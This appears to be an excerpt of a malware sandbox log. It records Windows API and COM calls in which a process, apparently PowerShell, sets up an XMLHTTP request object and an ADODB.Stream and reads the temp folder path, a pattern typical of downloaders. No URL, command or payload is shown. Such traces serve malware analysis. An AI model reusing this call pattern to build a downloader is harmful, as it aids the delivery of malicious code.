	[0052.362] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x7ffbf8960b40*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x184c18d620 | out: ppvObject=0x184c18d620*=0x0) returned 0x80004002
	[0052.363] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x7ffbf8960b70*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x184c18d260 | out: ppvObject=0x184c18d260*=0x0) returned 0x80004002
	[0052.363] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x7ffbf8960b80*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x184c18ce38 | out: ppvObject=0x184c18ce38*=0x0) returned 0x80004002
	[0052.364] XMLHTTP:IUnknown:AddRef (This=0x150600057f0) returned 0x3
	[0052.364] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x7ffbf8960b50*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x184c18cce8 | out: ppvObject=0x184c18cce8*=0x0) returned 0x80004002
	[0052.364] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x7ffbf8960b60*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x184c18cc80 | out: ppvObject=0x184c18cc80*=0x0) returned 0x80004002
	[0052.364] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x7ffbf89265f0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18cc70 | out: ppvObject=0x184c18cc70*=0x0) returned 0x80004002
	[0052.364] CoGetContextToken (in: pToken=0x184c18cd10 | out: pToken=0x184c18cd10) returned 0x0
	[0052.364] CObjectContext::QueryInterface () returned 0x0
	[0052.364] CObjectContext::GetCurrentApartmentType () returned 0x0
	[0052.364] Release () returned 0x0
	[0052.364] CoGetObjectContext (in: riid=0x7ffbf89265c8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1505fb18478 | out: ppv=0x1505fb18478*=0x15045551c70) returned 0x0
	[0052.364] CoGetContextToken (in: pToken=0x184c18d190 | out: pToken=0x184c18d190) returned 0x0
	[0052.364] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x7ffbf8960b90*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18d250 | out: ppvObject=0x184c18d250*=0x0) returned 0x80004002
	[0052.364] XMLHTTP:IUnknown:Release (This=0x150600057f0) returned 0x2
	[0052.364] XMLHTTP:IUnknown:Release (This=0x150600057f0) returned 0x1
	[0052.365] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18e330*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18e330*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x27, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0052.422] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd9cd0
	[0052.422] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1505fbd9cd0, nSize=0x10a | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0052.422] CoTaskMemFree (pv=0x1505fbd9cd0) 
	[0052.422] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18e3e8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18e3e8*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x29, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0052.422] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18e2f0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18e2f0*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x27, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0052.422] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18e3c8*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x29, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18e3c8*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x29, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0052.423] CLSIDFromProgID (in: lpszProgID="ADODB.Stream", lpclsid=0x1504777cb60 | out: lpclsid=0x1504777cb60*(Data1=0x566, Data2=0x0, Data3=0x10, Data4=([0]=0x80, [1]=0x0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x6d, [6]=0x2e, [7]=0xa4))) returned 0x0
	[0052.426] CoGetClassObject (in: rclsid=0x1505fbe9808*(Data1=0x566, Data2=0x0, Data3=0x10, Data4=([0]=0x80, [1]=0x0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x6d, [6]=0x2e, [7]=0xa4)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf895f5b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x184c18d728 | out: ppv=0x184c18d728*=0x1505fb18770) returned 0x0
	[0052.884] Stream:IUnknown:QueryInterface (in: This=0x1505fb18770, riid=0x7ffbf8983470*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x184c18d780 | out: ppvObject=0x184c18d780*=0x1505fb18770) returned 0x0
	[0052.884] Stream:IClassFactory:CreateInstance (in: This=0x1505fb18770, pUnkOuter=0x0, riid=0x7ffbf89265c8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18d730 | out: ppvObject=0x184c18d730*=0x1505fbce220) returned 0x0
	[0052.888] Stream:IUnknown:Release (This=0x1505fb18770) returned 0x2
	[0052.888] Stream:IUnknown:Release (This=0x1505fb18770) returned 0x1
	[0052.888] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x7ffbf89265c8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18d590 | out: ppvObject=0x184c18d590*=0x1505fbce220) returned 0x0
	[0052.888] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x7ffbf8960b40*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x184c18d620 | out: ppvObject=0x184c18d620*=0x0) returned 0x80004002
	[0052.890] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x7ffbf8960b70*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x184c18d260 | out: ppvObject=0x184c18d260*=0x0) returned 0x80004002
	[0052.890] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x7ffbf8960b80*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x184c18ce38 | out: ppvObject=0x184c18ce38*=0x0) returned 0x80004002
	[0052.890] Stream:IUnknown:AddRef (This=0x1505fbce220) returned 0x3
	[0052.890] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x7ffbf8960b50*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x184c18cce8 | out: ppvObject=0x184c18cce8*=0x0) returned 0x80004002
	[0052.890] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x7ffbf8960b60*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x184c18cc80 | out: ppvObject=0x184c18cc80*=0x0) returned 0x80004002
	[0052.890] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x7ffbf89265f0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18cc70 | out: ppvObject=0x184c18cc70*=0x1505fbce240) returned 0x0
	[0052.890] Stream:IMarshal:GetUnmarshalClass (in: This=0x1505fbce240, riid=0x7ffbf89265c8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x184c18cc98 | out: pCid=0x184c18cc98*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0052.891] Stream:IUnknown:Release (This=0x1505fbce240) returned 0x3
	[0052.891] CoGetContextToken (in: pToken=0x184c18cd10 | out: pToken=0x184c18cd10) returned 0x0
	[0052.891] CoGetContextToken (in: pToken=0x184c18d190 | out: pToken=0x184c18d190) returned 0x0
	[0052.891] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x7ffbf8960b90*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18d250 | out: ppvObject=0x184c18d250*=0x0) returned 0x80004002
	[0052.891] Stream:IUnknown:Release (This=0x1505fbce220) returned 0x2
	[0052.891] Stream:IUnknown:Release (This=0x1505fbce220) returned 0x1
	[0052.891] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18e330*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18e330*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x29, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0052.906] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd7ad0
	[0052.906] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1505fbd7ad0, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp") returned 0x24
	[0052.906] CoTaskMemFree (pv=0x1505fbd7ad0) 
	[0052.907] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd9cd0
	[0052.907] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505fbd9cd0, nSize=0x10a | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0052.907] CoTaskMemFree (pv=0x1505fbd9cd0) 
	[0052.916] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd9cd0
	[0052.916] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1505fbd9cd0, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp") returned 0x24
	[0052.916] CoTaskMemFree (pv=0x1505fbd9cd0) 
	[0053.047] CoGetContextToken (in: pToken=0x184c18df00 | out: pToken=0x184c18df00) returned 0x0
	[0053.047] CoGetContextToken (in: pToken=0x184c18de00 | out: pToken=0x184c18de00) returned 0x0
	[0053.047] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x184c18df60*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18df30 | out: ppvObject=0x184c18df30*=0x0) returned 0x80004002
	[0053.101] CoGetContextToken (in: pToken=0x184c18ddf0 | out: pToken=0x184c18ddf0) returned 0x0
	[0053.101] CoGetContextToken (in: pToken=0x184c18dcf0 | out: pToken=0x184c18dcf0) returned 0x0
	[0053.101] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x184c18de50*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18de20 | out: ppvObject=0x184c18de20*=0x0) returned 0x80004002
	[0053.127] CoGetContextToken (in: pToken=0x184c18de30 | out: pToken=0x184c18de30) returned 0x0
	[0053.127] CoGetContextToken (in: pToken=0x184c18dd30 | out: pToken=0x184c18dd30) returned 0x0
	[0053.127] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x184c18de90*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18de60 | out: ppvObject=0x184c18de60*=0x0) returned 0x80004002
	[0053.192] CoGetContextToken (in: pToken=0x184c18de00 | out: pToken=0x184c18de00) returned 0x0
	[0053.195] CoGetContextToken (in: pToken=0x184c18dd00 | out: pToken=0x184c18dd00) returned 0x0
	[0053.195] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x184c18de60*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18de30 | out: ppvObject=0x184c18de30*=0x150600057b0) returned 0x0
	[0053.195] XMLHTTP:IUnknown:AddRef (This=0x150600057b0) returned 0x3
	[0053.195] XMLHTTP:IUnknown:Release (This=0x150600057b0) returned 0x2
	[0053.203] XMLHTTP:IDispatch:GetTypeInfoCount (in: This=0x150600057b0, pctinfo=0x184c18de28 | out: pctinfo=0x184c18de28) returned 0x0
	[0053.203] XMLHTTP:IDispatch:GetTypeInfo (in: This=0x150600057b0, iTInfo=0x0, lcid=0x0, ppTInfo=0x184c18de20 | out: ppTInfo=0x184c18de20*=0x1505fc21fe8) returned 0x0
	[0053.214] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc21fe8, riid=0x7ffbf89265c8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18d720 | out: ppvObject=0x184c18d720*=0x1505fc21fe8) returned 0x0
	[0053.214] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc21fe8, riid=0x7ffbf8960b40*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x184c18d7b0 | out: ppvObject=0x184c18d7b0*=0x0) returned 0x80004002
	[0053.214] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc21fe8, riid=0x7ffbf8960b70*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x184c18d3f0 | out: ppvObject=0x184c18d3f0*=0x0) returned 0x80004002
	[0053.214] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc21fe8, riid=0x7ffbf8960b80*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x184c18cfc8 | out: ppvObject=0x184c18cfc8*=0x0) returned 0x80004002
	[0053.214] XMLHTTP:IUnknown:AddRef (This=0x1505fc21fe8) returned 0x4
	[0053.214] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc21fe8, riid=0x7ffbf8960b50*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x184c18ce78 | out: ppvObject=0x184c18ce78*=0x0) returned 0x80004002
	[0053.214] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc21fe8, riid=0x7ffbf8960b60*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x184c18ce10 | out: ppvObject=0x184c18ce10*=0x0) returned 0x80004002
	[0053.214] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc21fe8, riid=0x7ffbf89265f0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18ce00 | out: ppvObject=0x184c18ce00*=0x0) returned 0x80004002
	[0053.214] CoGetContextToken (in: pToken=0x184c18cea0 | out: pToken=0x184c18cea0) returned 0x0
	[0053.214] CoGetContextToken (in: pToken=0x184c18d320 | out: pToken=0x184c18d320) returned 0x0
	[0053.214] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc21fe8, riid=0x7ffbf8960b90*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18d3e0 | out: ppvObject=0x184c18d3e0*=0x0) returned 0x80004002
	[0053.214] XMLHTTP:IUnknown:Release (This=0x1505fc21fe8) returned 0x3
	[0053.214] CoGetContextToken (in: pToken=0x184c18d9a0 | out: pToken=0x184c18d9a0) returned 0x0
	[0053.215] CoGetContextToken (in: pToken=0x184c18d8a0 | out: pToken=0x184c18d8a0) returned 0x0
	[0053.215] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc21fe8, riid=0x184c18da00*(Data1=0x20401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18d9d0 | out: ppvObject=0x184c18d9d0*=0x1505fc21fe8) returned 0x0
	[0053.215] XMLHTTP:IUnknown:AddRef (This=0x1505fc21fe8) returned 0x5
	[0053.216] XMLHTTP:IUnknown:Release (This=0x1505fc21fe8) returned 0x4
	[0053.216] XMLHTTP:IUnknown:Release (This=0x1505fc21fe8) returned 0x3
	[0053.218] ITypeInfo:RemoteGetTypeAttr (in: This=0x1505fc21fe8, ppTypeAttr=0x184c18de28, pDummy=0x1505f3b6bb0 | out: ppTypeAttr=0x184c18de28, pDummy=0x1505f3b6bb0*=0x0) returned 0x0
	[0053.219] ITypeInfo:LocalReleaseTypeAttr (This=0x1505fc21fe8) returned 0x0
	[0053.226] ITypeInfo:RemoteGetDocumentation (in: This=0x1505fc21fe8, memid=-1, refPtrFlags=0x4c18dd80, pBstrName=0x184c18dd78, pBstrDocString=0x184c18de30, pdwHelpContext=0x184c18dd68, pBstrHelpFile=0x184c18dcd0 | out: pBstrName=0x184c18dd78*="IServerXMLHTTPRequest2 Interface", pBstrDocString=0x184c18de30*=0x0, pdwHelpContext=0x184c18dd68*=0x0, pBstrHelpFile=0x184c18dcd0*=0x0) returned 0x0
	[0053.229] SysStringByteLen (bstr="IServerXMLHTTPRequest2") returned 0x2c
	[0053.229] SysStringByteLen (bstr="IServerXMLHTTPRequest2 Interface") returned 0x40
	[0053.230] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x0, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.251] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x1, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.251] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x2, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.251] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x3, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.252] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x4, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.252] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x5, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.252] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x6, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.252] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.252] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x7, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.253] CoTaskMemAlloc (cb=0x30) returned 0x1505fbe6970
	[0053.253] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=1, rgBstrNames=0x1505fbe6970, cMaxNames=0x6, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fbe6970*="open", pcNames=0x184c18de18*=0x6) returned 0x0
	[0053.254] SysStringByteLen (bstr="open") returned 0x8
	[0053.254] SysStringByteLen (bstr="open") returned 0x8
	[0053.254] SysStringByteLen (bstr="bstrMethod") returned 0x14
	[0053.254] SysStringByteLen (bstr="bstrMethod") returned 0x14
	[0053.254] SysStringByteLen (bstr="bstrUrl") returned 0xe
	[0053.254] SysStringByteLen (bstr="bstrUrl") returned 0xe
	[0053.254] SysStringByteLen (bstr="varAsync") returned 0x10
	[0053.254] SysStringByteLen (bstr="varAsync") returned 0x10
	[0053.254] SysStringByteLen (bstr="bstrUser") returned 0x10
	[0053.254] SysStringByteLen (bstr="bstrUser") returned 0x10
	[0053.254] SysStringByteLen (bstr="bstrPassword") returned 0x18
	[0053.254] SysStringByteLen (bstr="bstrPassword") returned 0x18
	[0053.255] CoTaskMemFree (pv=0x1505fbe6970) 
	[0053.305] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x8, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.305] CoTaskMemAlloc (cb=0x18) returned 0x1505fb98420
	[0053.305] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=2, rgBstrNames=0x1505fb98420, cMaxNames=0x3, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fb98420*="setRequestHeader", pcNames=0x184c18de18*=0x3) returned 0x0
	[0053.305] SysStringByteLen (bstr="setRequestHeader") returned 0x20
	[0053.305] SysStringByteLen (bstr="setRequestHeader") returned 0x20
	[0053.305] SysStringByteLen (bstr="bstrHeader") returned 0x14
	[0053.305] SysStringByteLen (bstr="bstrHeader") returned 0x14
	[0053.305] SysStringByteLen (bstr="bstrValue") returned 0x12
	[0053.305] SysStringByteLen (bstr="bstrValue") returned 0x12
	[0053.305] CoTaskMemFree (pv=0x1505fb98420) 
	[0053.305] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x9, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.305] CoTaskMemAlloc (cb=0x10) returned 0x1505fb98420
	[0053.306] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=3, rgBstrNames=0x1505fb98420, cMaxNames=0x2, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fb98420*="getResponseHeader", pcNames=0x184c18de18*=0x2) returned 0x0
	[0053.306] SysStringByteLen (bstr="getResponseHeader") returned 0x22
	[0053.306] SysStringByteLen (bstr="getResponseHeader") returned 0x22
	[0053.306] SysStringByteLen (bstr="bstrHeader") returned 0x14
	[0053.306] SysStringByteLen (bstr="bstrHeader") returned 0x14
	[0053.306] CoTaskMemFree (pv=0x1505fb98420) 
	[0053.306] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0xa, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.306] CoTaskMemAlloc (cb=0x8) returned 0x1505fbde280
	[0053.306] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=4, rgBstrNames=0x1505fbde280, cMaxNames=0x1, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fbde280*="getAllResponseHeaders", pcNames=0x184c18de18*=0x1) returned 0x0
	[0053.306] SysStringByteLen (bstr="getAllResponseHeaders") returned 0x2a
	[0053.306] SysStringByteLen (bstr="getAllResponseHeaders") returned 0x2a
	[0053.306] CoTaskMemFree (pv=0x1505fbde280) 
	[0053.306] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0xb, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
